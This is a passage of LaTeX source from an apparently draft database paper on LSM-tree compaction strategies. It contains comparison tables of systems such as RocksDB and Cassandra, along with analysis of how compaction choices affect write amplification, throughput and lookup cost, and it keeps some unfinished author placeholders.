\multirow{2}{*}{RocksDB~\cite{FacebookRocksDB},}
& \multirow{1}{*}{Leveling /}
& \multirow{2}{*}{\cmark} & \multirow{2}{*}{} & \multirow{2}{*}{\cmark}
& \multirow{2}{*}{} & {} & {}
& {} & \multirow{2}{*}{\cmark} & \multirow{2}{*}{\cmark} & {}
& \multirow{2}{*}{\cmark} & \multirow{2}{*}{} & \multirow{2}{*}{\cmark}
& \multirow{2}{*}{\cmark} & \multirow{2}{*}{\cmark} & {} \\
\multirow{2}{*}{Monkey~\cite{Dayan2018a}}
& \multirow{1}{*}{1-Leveling} & & & & & & & & & & \\ \cline{2-19}
& \multirow{1.2}{*}{Tiering} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & {} & {} & {} & {} & \multirow{1.2}{*}{\cmark} \\ \midrule
\multirow{1}{*}{LevelDB~\cite{GoogleLevelDB},}
& \multirow{2}{*}{Leveling}
& \multirow{2}{*}{\cmark} & \multirow{2}{*}{} & {}
& {} & {} & {}
& {} & \multirow{2}{*}{\cmark} & \multirow{2}{*}{} & \multirow{2}{*}{\cmark}
& \multirow{2}{*}{\cmark} & \multirow{2}{*}{\cmark} & {}
& {} & {} & {} \\
\multirow{1}{*}{Monkey (J.)~\cite{Dayan2017}}
& {} & & & & & & & & & & \\ \midrule
SlimDB~\cite{Ren2017}
& {Tiering}
& \cmark & {} & {}
& {} & {} & {}
& {} & \cmark & \cmark & {}
& {} & {} & {}
& {} & {} & {} & \cmark \\ \midrule
Dostoevsky~\cite{Dayan2018}
& $L$-leveling & {\cmark$^{L}$} & {\cmark$^{T}$}
& {} & {} & {}
& {\cmark$^{L}$} & {\cmark$^{T}$} & {} & {}
& {} & {\cmark$^{L}$} & {}
& {} & {} & {} & {} & {\cmark$^{T}$} \\ \midrule
LSM-Bush~\cite{Dayan2019}
& {Hybrid leveling} & {\cmark$^{L}$} & {\cmark$^{T}$}
& {} & {} & {}
& {\cmark$^{L}$} & {\cmark$^{T}$} & {} & {}
& {} & {\cmark$^{L}$} & {}
& {} & {} & {} & {} & {\cmark$^{T}$} \\ \midrule
Lethe~\cite{Sarkar2020}
& Leveling
& \cmark & {}
& {} & {} & {\cmark} &
& {} & \cmark & \cmark & {}
& {\cmark} & & &
& & \cmark \\ \midrule
Silk~\cite{Balmau2019}, Silk+~\cite{Balmau2020}
& {Leveling}
& {\cmark} & {}
& {} & {} & {} & {}
& {} & {\cmark} & {\cmark} & {\cmark}
& {} & {} & {} & {}
& {} & {} \\ \midrule
HyperLevelDB~\cite{HyperLevelDB}
& {Leveling} & {\cmark} & {}
& {} & {} & {}
& {} & {} & {\cmark} & {}
& {\cmark} & {\cmark} & {\cmark}
& {} & {} & {} \\ \midrule
PebblesDB~\cite{Raju2017}
& {Hybrid leveling} & {\cmark} & {}
& {} & {} & {}
& {} & {} & {\cmark} & {\cmark}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \midrule
\multirow{2}{*}{Cassandra~\cite{ApacheCassandra}}
& \multirow{1}{*}{Tiering}
& {} & {\cmark}
& {\cmark} & {} & {\cmark}
& {} & {\cmark} & {} & {}
& {} & {} & {}
& {} & {} & {} &{} &{\cmark}
\\ \cline{2-19}
& \multirow{1.2}{*}{Leveling}
& \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{\cmark}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} &\multirow{1.2}{*}{\cmark}
\\ \midrule
WiredTiger~\cite{WiredTiger}
& {Leveling} & {\cmark} & {}
& {} & {} & {}
& {\cmark} & {} & {} & {}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \midrule
X-Engine~\cite{Huang2019}, Leaper~\cite{Yang2020}
& {Hybrid leveling} & {\cmark} & {}
& {} & {} & {}
& {} & {} & {\cmark} & {\cmark}
& {} & {\cmark} & {}
& {} & {} & {\cmark} \\ \midrule
HBase~\cite{ApacheHBase}
& {Tiering} & {} & {\cmark}
& {} & {} & {}
& {} & {\cmark} & {} & {}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \midrule
\multirow{2}{*}{AsterixDB~\cite{Alsubaiee2014}}
& \multirow{1}{*}{Leveling} & {\cmark} & {{}}
& {} & {} & {}
& {\cmark} & {} & {} & {}
& {} & {} & {}
& {} & {} & {} & {} &{\cmark} \\ \cline{2-19}
& \multirow{1.2}{*}{Tiering}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark}
\\ \midrule
Tarantool~\cite{Tarantool}
& {$L$-leveling} & {\cmark$^L$} & {\cmark$^T$}
& {} & {} & {}
& {\cmark$^L$} & {\cmark$^T$} & {} & {}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \midrule
\multirow{2}{*}{ScyllaDB~\cite{ScyllaDB}}
& \multirow{1}{*}{Tiering} & {} & {\cmark}
& {\cmark} & {} & {\cmark}
& {} & {\cmark} & {} & {}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \cline{2-19}
& \multirow{1.2}{*}{Leveling}
& \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{\cmark}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{}
& \multirow{1.2}{*}{} & \multirow{1.2}{*}{} & \multirow{1.2}{*}{\cmark} & \multirow{1.2}{*}{\cmark} &\multirow{1.2}{*}{} \\ \midrule
bLSM~\cite{Sears2012}, cLSM~\cite{Golan-Gueta2015}
& {Leveling} & {\cmark} & {}
& {} & {} & {}
& {} & {} & {\cmark} & {}
& {\cmark} & {} & {}
& {} & {} & {} \\ \midrule
Accumulo~\cite{ApacheAccumulo}
& {Tiering} & {\cmark} & {\cmark}
& {} & {} & {\cmark}
& {} & {\cmark} & {} & {}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \midrule
LSbM-tree~\cite{Teng2017,Teng2018}
& {Leveling} & {\cmark} & {}
& {} & {} & {}
& {\cmark} & {} & {} & {}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \midrule
SifrDB~\cite{Mei2018}
& {Tiering} & {\cmark} & {}
& {} & {} & {}
& {} & {} & {} & {\cmark}
& {} & {} & {}
& {} & {} & {} & {} & {\cmark} \\ \hline
\bottomrule
\end{tabular}
}
\caption{Compaction strategies in state-of-the-art systems. [\footnotesize{\cmark$^{L}$\normalsize: for levels with leveling; \footnotesize\cmark$^{T}$\normalsize: for levels with tiering.}\normalsize] \label{tab:db}}
\vspace{-0.35in}
\end{table}
\Paragraph{The Compaction Design Space Cardinality}
Two compaction strategies are considered different from each other if they differ in at least one of the four primitives.
Compaction strategies that
differ in only one primitive, can have vastly different performance when subject to the same workload while running on identical hardware.
Plugging in some typical values for the cardinality of the primitives, we estimate the cardinality of the compaction universe as >$10^4$, a vast yet largely unexplored design space.
Table \ref{tab:db} shows a representative part of this space, detailing the compaction strategies used in more than twenty academic and production systems.
\Paragraph{Compactions Analyzed}
For our analysis and experimentation, we select ten representative compaction strategies that are prevalent in production and academic LSM-based systems.
We codify and present these candidate compaction strategies in Table \ref{tab:comp_list}.
\texttt{Full} represents the compaction strategy for leveled LSM-trees that compacts entire levels upon invocation.
\texttt{LO+1} and \texttt{LO+2} denote two partial compaction routines that choose a file for compaction with the smallest overlap with files in the parent ($i+1$) and grandparent ($i+2$) levels, respectively.
\texttt{RR} chooses files for compaction in a round-robin fashion from each level.
\texttt{Cold} and \texttt{Old} are read-friendly strategies that mark the coldest and oldest file(s) in a level for compaction, respectively.
\texttt{TSD} and \texttt{TSA} are delete-driven compaction strategies with triggers and data movement policies that are determined by the density of tombstones and the age of the oldest tombstone contained in a file, respectively.
\texttt{Tier} represents a variant of tiered data layout, where compactions are triggered when either (a) the number of sorted runs in a level or (b) the estimated space amplification in the tree reaches certain thresholds.
This interpretation of tiering is also referred to as \textit{universal compaction} in systems like RocksDB~\cite{Kryczka2020,RocksDB2020}.
Finally, \texttt{1-Lvl} represents a hybrid data layout where the first disk level is realized as \textit{tiered} while the others as \textit{leveled}.
This is the default data layout for RocksDB~\cite{Kryczka2020,RocksDB2020a}.
\begin{table*}[!ht]
\centering
\resizebox{\textwidth}{!}{%
\begin{tabular}{L{2cm}|C{1.9cm}|C{1.6cm}|C{1.3cm}|C{1.2cm}|C{2.8cm}|C{1.5cm}|C{1.7cm}|C{2.8cm}|C{1.8cm}|C{2.9cm}}
\toprule
\multirow{2}{*}{\textbf{Primitives}} & \textbf{\texttt{Full} \cite{Alsubaiee2014,Teng2017,WiredTiger}} & \textbf{\texttt{LO+1} \cite{FacebookRocksDB,Dayan2018a,Sarkar2020}} & \textbf{\texttt{Cold} \cite{FacebookRocksDB}} & \textbf{\texttt{Old} \cite{FacebookRocksDB}} & \textbf{\texttt{TSD} \cite{FacebookRocksDB,Huang2019}} & \textbf{\texttt{RR} \cite{GoogleLevelDB,HyperLevelDB,Sears2012,Golan-Gueta2015}} & \textbf{\texttt{LO+2} \cite{GoogleLevelDB,HyperLevelDB}} & \textbf{\texttt{TSA} \cite{Sarkar2020}} & \textbf{\texttt{Tier} \cite{Ren2017,ApacheCassandra,HBase2013}} & \textbf{\texttt{1-Lvl} \cite{FacebookRocksDB,Kryczka2020,RocksDB2020a}} \\
\midrule
\multirow{2}{*}{Trigger} & \multirow{2}{*}{level saturation} & \multirow{2}{*}{level sat.} & \multirow{2}{*}{level sat.} & \multirow{2}{*}{level sat.} & \multirow{1}{*}{1. TS-density} & \multirow{2}{*}{level sat.} & \multirow{2}{*}{level sat.} & \multirow{1}{*}{1. TS age} & \multirow{1}{*}{1. \#sorted runs} & \multirow{1}{*}{1. \#sorted runs$^T$} \\
& & & & & 2. level sat. & & & 2. level sat. & \multirow{1}{*}{2. space amp.} & \multirow{1}{*}{2. level sat.$^L$} \\
\midrule
\multirow{1}{*}{Data layout} & leveling & leveling & leveling & leveling & leveling & leveling & leveling & leveling & tiering & hybrid \\
\midrule
\multirow{2}{*}{Granularity} & \multirow{2}{*}{levels} & \multirow{2}{*}{files} & \multirow{2}{*}{files} & \multirow{2}{*}{files} & \multirow{2}{*}{files} & \multirow{2}{*}{files} & \multirow{2}{*}{files} & \multirow{2}{*}{files} & \multirow{2}{*}{sorted runs} & \multirow{1}{*}{1. sorted runs$^T$} \\
& & & & & & & & & & \multirow{1}{*}{2. files$^L$} \\
\midrule
\multirow{1}{*}{Data~movement} & \multirow{2}{*}{N/A} & \multirow{1}{*}{least overlap.} & \multirow{2}{*}{coldest file} & \multirow{2}{*}{oldest file} & \multirow{1}{*}{1. most tombstones} & \multirow{2}{*}{round-robin} & \multirow{1}{*}{least overlap.} & \multirow{1}{*}{1. expired TS-TTL} & \multirow{2}{*}{N/A} & \multirow{1}{*}{1. N/A$^T$} \\
\multirow{1}{*}{policy} & & \multirow{1}{*}{parent} & & & \multirow{1}{*}{2.~least~overlap.~parent} & & \multirow{1}{*}{grandparent} & \multirow{1}{*}{2.~least~overlap.~parent} & & \multirow{1}{*}{2. least overlap. parent$^L$}\\
\bottomrule
\end{tabular}
}
\caption{Compaction strategies evaluated in this work. [\footnotesize{$^{L}$\normalsize: levels with leveling; \footnotesize$^{T}$\normalsize: levels with tiering.}\normalsize]\label{tab:comp_list}}
\vspace{-0.25in}
\end{table*}
\subsection{Write Performance}
The primary objective of compactions is to re-organize the data stored on disk to create fewer longer sorted runs.
However, as data on disk are stored in immutable files, in-place modifications are not supported in LSM-trees.
Each compaction job, thus, takes as input a number of immutable files that are read to memory from disk, and writes back a new set of immutable files to disk after the compaction job is completed.
From the stand-point of a write-optimized data store, this data movement due to compaction is often classified as superfluous and causes high write amplification, which results in under-utilization of the device bandwidth and leads to poor write throughput~\cite{Raju2017}.
Below, we discuss how the different dimensions of compactions affect the write performance, which is further summarized in Table \ref{tab:perf}.
\subsubsection{\textbf{Write amplification}} We define write amplification as the count for the number of times an entry is (re-)written without any modifications to disk during its lifetime (i.e., until it is physically deleted from the disk).
While in an ideal write-optimized store, write amplification should be $1$ (i.e., entries are written in a log), periodic (re-)organization of data in LSM-trees leads to significantly high write amplification~\cite{Raju2017}.
\textit{\blue{Data layout}.} In a leveled LSM-tree, every time a Level $i$ reaches its capacity, all (or a subset of) files from Level $i$ are compacted with all (or the overlapping) the files from Level $i+1$; thus, on average each entry is written $T$ times within a level which leads to an average-case write amplification of $\mathcal{O}(T \cdot L)$.
For a tiered LSM, each level may have up to $T$ sorted runs with overlapping key-ranges; thus, each entry is written at least once per level resulting in an average-case write amplification of $\mathcal{O}(L)$.
An $l$-leveled LSM-tree has its last $l$ levels implemented as leveled with the remaining shallower $L-l$ levels as tiering; and thus, the average-case write amplification in an $l$-leveled tree is given as $\mathcal{O}(L-l) + \mathcal{O}(T \cdot l)$.
Similarly, for a hybrid LSM-tree, the average-case write amplification can be expressed as $\mathcal{O}(L-i) + \mathcal{O}(T \cdot i)$, where $L-i$ denotes the number of tiered levels in the tree.
\textit{Compaction trigger.} Compaction triggers that relate to level capacity are the primary trigger in all LSM-trees, and thus, constitute the baseline for our write amplification analysis.
Any additional triggers, such as staleness of a file, expired tombstone TTLs, space amplification, and read amplification manifests in more frequent compactions, which leads to higher write amplification.
However, such secondary triggers often optimizes for a different performance metric, which may amortize the write amplification over time~\cite{Sarkar2020}.
\textit{Compaction granularity.} Compaction granularity controls the average amount of data movement per compaction job, and is typically driven by the size of the immutable files.
The granularity of compaction do not affect the write amplification, as the total amount of data compacted over time remains the same regardless of the granularity of data movement.
\textit{Data movement policy.} The data movement policy in LSM-based storage engines is typically chosen as to optimize for a set of performance metrics, and thus, plays a crucial role on the overall performance of the engine, including write amplification.
The average write amplification remains as $\mathcal{O}(T \cdot L)$ for leveling and $\mathcal{O}(T)$ for tiering as files are chosen for compaction at random or in a round-robin manner once a compaction job is triggered.
However, choosing the file with the least overlap with its parent or grandparent levels optimizes for write amplification, and thus, have a reduced data movement due to compactions.
For compaction strategies that optimize for other performance goals, such as read performance, space amplification, and delete performance, the write amplification is often measured to be higher than that of the average case.
\subsubsection{\textbf{Write Throughput}} The write throughput of an LSM-tree is principally driven by the degree of utilization of the device bandwidth by writes.
The bandwidth utilization, in turn, is affected by (i) any write stalls resulting from the compactions and (ii) the absolute bandwidth support provided by the device.
While the time taken to complete a compaction job influences the frequency and amplitude of the write stalls, the overall data movement due to compaction determines the bandwidth of the device that can be used for writing the ingested data.
Thus, for a given device, write throughput is affected by compactions in the same way as write amplification.
\textit{\blue{Data layout}.} A leveled LSM-tree performs compactions eagerly whenever the memory buffer is full or a disk level reaches a nominal capacity.
This triggers compactions frequently, which consumes the device bandwidth at a greater degree, and affects the write throughput adversely.
In contrast, in tiering, compactions are less frequent and with the device bandwidth mostly free of compaction traffic, the write throughput is significantly improved.
\textit{Compaction trigger.} In presence of secondary compaction triggers (alongside saturation-driven primary triggers), the data movement due to compactions may increase which leads to reduced write throughput.
However, in most practical cases, additional compaction triggers this additional data movement due to compactions amortizes significantly over time, and thus, in the long run, the write amplification remains almost unaffected by the presence of secondary compaction triggers.
\textit{Compaction granularity.} Larger compaction granularity results in long-living compaction jobs, which often leads to prolonged write stalls, and thereby, a steep drop in the write throughput for a significant duration, increasing the tail-latency for writes.
Such latency spikes are generally infrequent, but highly prevalent in leveled LSM-trees that compacts whole levels at at time~\cite{ONeil1996}, leveled LSM-trees with partial compaction routines that compacts several files at a time, and in most tiered LSM-trees~\cite{ApacheCassandra,ApacheHBase}.
A smaller compaction granularity amortized such latency spikes over time by performing smaller but more frequent compactions throughout the workload execution~\cite{FacebookRocksDB}.
However, it is noteworthy that the overall amount of data movement due to compactions always remains the same regardless of the compaction granularity, and thus, the overall write throughput remains unaffected by the granularity of compactions.
It is just that a smaller compaction granularity is free from any undesired latency spikes and write stalls, thereby ensuring bounded tail-latency for writes.
\textit{Data movement policy.} Similarly to write amplification, the data movement policy also plays a critical role on the write throughput of a storage engine.
Partial compaction routines that chooses the files with minimal overlap with the target level, saturates the device bandwidth with compaction traffic the least, and hence, has the highest write throughput.
Optimizing for no or other performance metrics, on the other hand, increases the compaction traffic considerably, and thus, demonstrate a reduced throughput for writes.
\subsubsection{\textbf{SSD Lifetime}}
\red{We might end up writing a small para on how compactions affect the lifetime of SSDs here.}
\begin{table*}[ht]
\centering
\resizebox{\textwidth}{!}{%
\begin{tabular}{ccl|ccccccc|ccccccc|ccccccc}
\toprule
\MCL{3}{c|}{\MRW{2.5}{\begin{tabular}[c]{@{}c@{}}\textbf{Compaction} \end{tabular}}}
& \MCL{7}{c|}{\textbf{\MRW{1}{\begin{tabular}[c]{@{}c@{}}\textbf{Workload} \end{tabular}}}}
& \MCL{7}{c|}{\textbf{\MRW{1}{\begin{tabular}[c]{@{}c@{}}\textbf{Workload} \end{tabular}}}}
& \MCL{7}{c}{\textbf{\MRW{1}{\begin{tabular}[c]{@{}c@{}}\textbf{Workload} \end{tabular}}}} \\
\MCL{3}{c|}{\MRW{2.5}{\begin{tabular}[c]{@{}c@{}}\textbf{Knob} \end{tabular}}}
& \MCL{7}{c|}{\textbf{A}}
& \MCL{7}{c|}{\textbf{B}}
& \MCL{7}{c}{\textbf{C}} \\ \cline{4-24}
& & & Write & PL & SRQ & LRQ & SA & WA & DPL
& Write & PL & SRQ & LRQ & SA & WA & DPL
& Write & PL & SRQ & LRQ & SA & WA & DPL \\\hline \bottomrule
\MRW{5}{\rotatebox[origin=c]{90}{\textbf{Compaction}}}
& \MCL{1}{c|}{\MRW{5}{\hspace*{-12pt} \rotatebox[origin=c]{90}{\textbf{\blue{Data layout}}}}}
& \MRW{1.5}{Leveling}
& \MRW{1.5}{\Up} & \MRW{1.5}{\Upp} & \MRW{1.5}{\Up} & \MRW{1.5}{\Dww}
& \MRW{1.5}{\Up} & \MRW{1.5}{--} & \MRW{1.5}{\Up}
& \MRW{1.5}{\Dwww} & \MRW{1.5}{\Dwww} & \MRW{1.5}{\Up} & \MRW{1.5}{\Up}
& \MRW{1.5}{\Dw} & \MRW{1.5}{\Dw} & \MRW{1.5}{\Dw}
& \MRW{1.5}{\Dwww} & \MRW{1.5}{\Up} & \MRW{1.5}{\Up} & \MRW{1.5}{\Upp}
& \MRW{1.5}{\Upp} & \MRW{1.5}{\Upp} & \MRW{1.5}{\Upp} \\
& \MCL{1}{c|}{}
& \MRW{2}{Tiering}
& \MRW{2}{\Up} & \MRW{2}{\Upp} & \MRW{2}{\Up} & \MRW{2}{\Dww}
& \MRW{2}{\Up} & \MRW{2}{--} & \MRW{2}{\Up}
& \MRW{2}{\Dwww} & \MRW{2}{\Dwww} & \MRW{2}{\Up} & \MRW{2}{\Up}
& \MRW{2}{\Dw} & \MRW{2}{\Dw} & \MRW{2}{\Dw}
& \MRW{2}{\Dwww} & \MRW{2}{\Up} & \MRW{2}{\Up} & \MRW{2}{\Upp}
& \MRW{2}{\Upp} & \MRW{2}{\Upp} & \MRW{2}{\Upp} \\
& \MCL{1}{c|}{}
& \MRW{2.5}{$l$-leveling}
& \MRW{2.5}{\Up} & \MRW{2.5}{\Upp} & \MRW{2.5}{\Up} & \MRW{2.5}{\Dww}
& \MRW{2.5}{\Up} & \MRW{2.5}{--} & \MRW{2.5}{\Up}
& \MRW{2.5}{\Dwww} & \MRW{2.5}{\Dwww} & \MRW{2.5}{\Up} & \MRW{2.5}{\Up}
& \MRW{2.5}{\Dw} & \MRW{2.5}{\Dw} & \MRW{2.5}{\Dw}
& \MRW{2.5}{\Dwww} & \MRW{2.5}{\Up} & \MRW{2.5}{\Up} & \MRW{2.5}{\Upp}
& \MRW{2.5}{\Upp} & \MRW{2.5}{\Upp} & \MRW{2.5}{\Upp} \\
& \MCL{1}{c|}{}
& \MRW{3}{Hybrid}
& \MRW{3}{\Up} & \MRW{3}{\Upp} & \MRW{3}{\Up} & \MRW{3}{\Dww}
& \MRW{3}{\Up} & \MRW{3}{--} & \MRW{3}{\Up}
& \MRW{3}{\Dwww} & \MRW{3}{\Dwww} & \MRW{3}{\Up} & \MRW{3}{\Up}
& \MRW{3}{\Dw} & \MRW{3}{\Dw} & \MRW{3}{\Dw}
& \MRW{3}{\Dwww} & \MRW{3}{\Up} & \MRW{3}{\Up} & \MRW{3}{\Upp}
& \MRW{3}{\Upp} & \MRW{3}{\Upp} & \MRW{3}{\Upp} \\
& \MCL{1}{c|}{} & & & & & & & & & & & & & & & & \\ \midrule
\MRW{6}{\rotatebox[origin=c]{90}{\textbf{Compaction}}}
& \MCL{1}{c|}{\MRW{6}{\hspace*{-12pt} \rotatebox[origin=c]{90}{\textbf{Trigger}}}}
& \MRW{1.25}{\#Bytes}
& \MRW{1.25}{\GA} & \MRW{1.25}{\GA} & \MRW{1.25}{\GA\GA\GA} & \MRW{1.25}{\RA}
& \MRW{1.25}{\NA} & \MRW{1.25}{\NA} & \MRW{1.25}{\BA}
& \MRW{1.25}{\GA} & \MRW{1.25}{\RA} & \MRW{1.25}{\BA} & \MRW{1.25}{\BA}
& \MRW{1.25}{\GA} & \MRW{1.25}{\GA} & \MRW{1.25}{\GA}
& \MRW{1.25}{\GA} & \MRW{1.25}{\BA} & \MRW{1.25}{\BA} &
& \MRW{1.25}{\GA\GA} & \MRW{1.25}{\GA\GA} & \MRW{1.25}{\GA\GA} \\
& \MCL{1}{c|}{}
& \MRW{1.5}{\#Files}
& \MRW{1.5}{\GA} & \MRW{1.5}{\GA} & \MRW{1.5}{\GA\hspace*{-1pt}\GA\hspace*{-1pt}\GA} & \MRW{1.5}{\RA}
& \MRW{1.5}{\NA} & \MRW{1.5}{\NA} & \MRW{1.5}{\BA}
& \MRW{1.5}{\GA} & \MRW{1.5}{\RA} & \MRW{1.5}{\BA} & \MRW{1.5}{\BA}
& \MRW{1.5}{\GA} & \MRW{1.5}{\GA} & \MRW{1.5}{\GA}
& \MRW{1.5}{\GA} & \MRW{1.5}{\BA} & \MRW{1.5}{\BA} &
& \MRW{1.5}{\GA\GA} & \MRW{1.5}{\GA\GA} & \MRW{1.5}{\GA\GA} \\
& \MCL{1}{c|}{}
& \MRW{1.75}{\#Sorted runs}
& \MRW{1.75}{\GA} & \MRW{1.75}{\GA} & \MRW{1.75}{\GA\GA\GA} & \MRW{1.75}{\RA}
& \MRW{1.75}{\NA} & \MRW{1.75}{\NA} & \MRW{1.75}{\BA}
& \MRW{1.75}{\GA} & \MRW{1.75}{\RA} & \MRW{1.75}{\BA} & \MRW{1.75}{\BA}
& \MRW{1.75}{\GA} & \MRW{1.75}{\GA} & \MRW{1.75}{\GA}
& \MRW{1.75}{\GA} & \MRW{1.75}{\BA} & \MRW{1.75}{\BA} &
& \MRW{1.75}{\GA\GA} & \MRW{1.75}{\GA\GA} & \MRW{1.75}{\GA\GA} \\
& \MCL{1}{c|}{}
& \MRW{2}{Staleness of file}
& \MRW{2}{\GA} & \MRW{2}{\GA} & \MRW{2}{\GA\GA\GA} & \MRW{2}{\RA}
& \MRW{2}{\NA} & \MRW{2}{\NA} & \MRW{2}{\BA}
& \MRW{2}{\GA} & \MRW{2}{\RA} & \MRW{2}{\BA} & \MRW{2}{\BA}
& \MRW{2}{\GA} & \MRW{2}{\GA} & \MRW{2}{\GA}
& \MRW{2}{\GA} & \MRW{2}{\BA} & \MRW{2}{\BA} &
& \MRW{2}{\GA\GA} & \MRW{2}{\GA\GA} & \MRW{2}{\GA\GA} \\
& \MCL{1}{c|}{}
& \MRW{2.25}{Space amp.}
& \MRW{2.25}{\GA} & \MRW{2.25}{\GA} & \MRW{2.25}{\GA\GA\GA} & \MRW{2.25}{\RA}
& \MRW{2.25}{\NA} & \MRW{2.25}{\NA} & \MRW{2.25}{\BA}
& \MRW{2.25}{\GA} & \MRW{2.25}{\RA} & \MRW{2.25}{\BA} & \MRW{2.25}{\BA}
& \MRW{2.25}{\GA} & \MRW{2.25}{\GA} & \MRW{2.25}{\GA}
& \MRW{2.25}{\GA} & \MRW{2.25}{\BA} & \MRW{2.25}{\BA} &
& \MRW{2.25}{\GA\GA} & \MRW{2.25}{\GA\GA} & \MRW{2.25}{\GA\GA} \\ \vspace*{-2pt}
& \MCL{1}{c|}{} & & & & & & & & & & & & & & & & \\ \midrule
\MRW{5}{\rotatebox[origin=c]{90}{\textbf{Compaction}}}
& \MCL{1}{c|}{\MRW{5}{\hspace*{-12pt} \rotatebox[origin=c]{90}{\textbf{Granularity}}}}
& \MRW{1.5}{Level}
& \MRW{4}{\cmark} & \MRW{4}{\cmark} & {}
& \MRW{4}{\small{\ding{109}}} & {} & {}
& {} & \MRW{4}{\cmark} & \MRW{4}{\small{\ding{109}}} & {}
& {} & \MRW{4}{\cmark} & \MRW{4}{\cmark}
& \MRW{4}{\cmark} & \MRW{4}{\cmark} & {} & & & & & \\
& \MCL{1}{c|}{}
& \MRW{2}{File (single)} & \Up & & & & & & & & & & & & & & \\
& \MCL{1}{c|}{}
& \MRW{2.5}{File (multiple)} & & & & & & & & & & & & & & & \\
& \MCL{1}{c|}{}
& \MRW{3}{Sorted run} & {}
& {} & \cmark & \small{\ding{109}} & \cmark & {}
& \cmark & {} & {} & {}
& {} & {} & {} & & & & & \\
& \MCL{1}{c|}{} & & & & & & & & & & & & & & & & \\ \midrule
\MRW{6}{\rotatebox[origin=c]{90}{\textbf{Data Movement}}}
& \MCL{1}{c|}{\MRW{6}{\hspace*{-12pt} \rotatebox[origin=c]{90}{\textbf{Policy}}}}
& \MRW{1}{Round-robin}
& \MRW{4}{\cmark} & \MRW{4}{\cmark} & {}
& \MRW{4}{\small{\ding{109}}} & {} & {}
& {} & \MRW{4}{\cmark} & \MRW{4}{\small{\ding{109}}} & {}
& {} & \MRW{4}{\cmark} & \MRW{4}{\cmark}
& \MRW{4}{\cmark} & \MRW{4}{\cmark} & {} & & & & & \\
& \MCL{1}{c|}{}
& \MRW{1}{Least overlap} & & & & & & & & & & & & & & & \\
& \MCL{1}{c|}{}
& \MRW{1}{Coldest file} & & & & & & & & & & & & & & & \\
& \MCL{1}{c|}{}
& \MRW{1}{Oldest file} & & & & & & & & & & & & & & & \\
& \MCL{1}{c|}{}
& \MRW{1}{File w/ most TS} & {}
& {} & \cmark & \small{\ding{109}} & \cmark & {}
& \cmark & {} & {} & {}
& {} & {} & {} & & & & & \\
& \MCL{1}{c|}{}
& \MRW{1}{Expired TS-TTL} & & & & & & & & & & & & & & & & \\ \midrule
\bottomrule
\end{tabular}
}
\caption{Implications of compaction knobs on performance in LSM-based systems.
\label{tab:perf}}
\vspace{-0.25in}
\end{table*}
\subsection{Read Performance}
The fundamental purpose of re-organizing of data on disk through compactions is to facilitate efficient point lookup and range scan operations in LSM-trees.
However, as reads and writes have to the same device bandwidth, compactions affect the read performance for mixed workloads that have ingestion and lookups interleaved.
Even for a read-only workload, the position of the data in the tree as well as the number of levels in the tree are affected by the compaction strategy, which in turn, affect the point and range lookup performance. Below, we present how the different dimensions of compactions affect the read performance of an LSM-tree.
\subsubsection{\textbf{Point Lookups}} The point lookup performance of an LSM-tree is enhanced at a cost of extra main memory space that is used to store auxiliary data structures, such as Bloom filters and fence pointers.
While Bloom filters probabilistically reduces the number of runs to be probed for a point lookup, and fence pointers ensure that we perform only a single I/O per sorted run, if the Bloom filter probe returns positive.
Compacting files often pushes the entries in the files to a deeper level, and this may asymptotically increase the cost for lookups.
\textit{\blue{Data layout}.}
The average cost for a point lookup operation on an non-existing key is given as $\mathcal{O}(L \cdot e^{-BPK})$ for leveling and $\mathcal{O}(T \cdot L \cdot e^{-BPK})$ in case of tiering.
A point lookup on an existing must always perform at least one I/O to fetch the target key, and thus, the average cost for this given as $\mathcal{O}(1 + L \cdot e^{-BPK})$ for leveling and $\mathcal{O}(1 + T \cdot L \cdot e^{-BPK})$ for leveling.
For a hybrid design, the average lookup cost for non-existing keys becomes \red{fill in}, and similarly for lookups on existing keys.
\textit{Compaction trigger.} Compaction triggers affect the point lookup performance insignificantly. In presence of secondary triggers, compaction jobs may become more frequent, which consumes a significant proportion of the device bandwidth.
While this affects the point lookup throughput marginally, it constitutes a serious performance bottleneck in scan-heavy workload, about which discuss in the Section \ref{sec:4.2.2}.
\textit{Compaction granularity.} The granularity of data movement during a compaction job affects the point lookup performance on existing keys to some extent.
For tiered LSMs and leveled LSMs with a full compaction routine, once a Level $i$ reaches a nominal capacity, all entries from that level are compacted and moved to the Level $i+1$ (rendering Level $i$ to be empty).
